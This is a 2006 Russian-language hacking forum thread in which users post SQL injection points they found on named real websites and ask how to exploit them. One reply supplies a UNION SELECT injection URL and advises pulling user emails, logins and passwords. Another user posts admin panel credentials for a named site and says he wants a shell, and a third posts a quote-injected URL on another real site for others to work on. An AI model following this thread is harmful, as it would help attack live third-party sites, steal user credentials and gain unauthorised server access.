HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Что можно зделать??
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Что можно зделать??
  #1  
Старый 11.03.2006, 20:49
Danox
Новичок
Регистрация: 23.01.2006
Сообщений: 7
С нами: 10681678

Репутация: -1
По умолчанию Что можно зделать??
Народ на сайте нашел уязвимость пишет
MySQL query error.
Query was: SELECT subj,text FROM message WHERE id=
MySQL returned: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
$REQUEST_URI:
/start.php?page=email&act=ch&id=

Что с ней можно зделать???
Я просто некокгда дело с sql инъекциями не имел
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 11.03.2006, 21:21
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
С нами: 10994966

Репутация: 1332


По умолчанию
обратись по браузеру так:
/start.php?page=email&act=ch&id=-1+union+select+1,2
если ошибки не будет и в исходном коде ты явно увидишь 1 или 2, то попробуй достать данные из таблицы юзеров с мылами, логинами, паролям к ним. Только сразу помотри там есть страничка авторизации например, а то народ находит инекции, а что делать с ними не знает.
ps читай статьи
 
Ответить с цитированием

  #3  
Старый 11.03.2006, 21:26
Danox
Новичок
Регистрация: 23.01.2006
Сообщений: 7
С нами: 10681678

Репутация: -1
По умолчанию
http://cms.lionmobile.com/admin.php
Логин test
Пасс test
хотелось шелл =)
 
Ответить с цитированием

  #4  
Старый 13.03.2006, 08:15
FIND ME
Новичок
Регистрация: 15.05.2005
Сообщений: 8
С нами: 11047234

Репутация: 1
По умолчанию
vot SQL INJ
http://www.g19yfl.com/schedules/fieldSchedule.php?ID=33'

pokazite chto mozno sdelat
failu ne chitaet a nazvaniya tables ya ne znau kak uznat
 
Ответить с цитированием

  #5  
Старый 13.03.2006, 15:48
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
С нами: 10997666

Репутация: 1320


По умолчанию
Цитата:
Сообщение от FIND ME  
vot SQL INJ
http://www.g19yfl.com/schedules/fieldSchedule.php?ID=33'

pokazite chto mozno sdelat
failu ne chitaet a nazvaniya tables ya ne znau kak uznat
Мне тоже интересно стало, что там можно сделать? Там sql-inj эта подставляется сразу в два запроса с разным количеством полей. И в одном из них еще надо, чтобы возвращалась только одна строка.
Надо думать еще....
Вечером еще попробую... Если у кого-нить получится че-нить, отпишите как...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Открытое письмо журналу "Хакер" TheFile Болталка 34 31.01.2009 21:03
Как восстановить нечитающийся Cd? novichok "Железо" 8 02.05.2007 12:15
химия своими руками silveran Болталка 43 11.01.2006 22:05
Пиянство mifan Болталка 18 03.09.2004 12:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.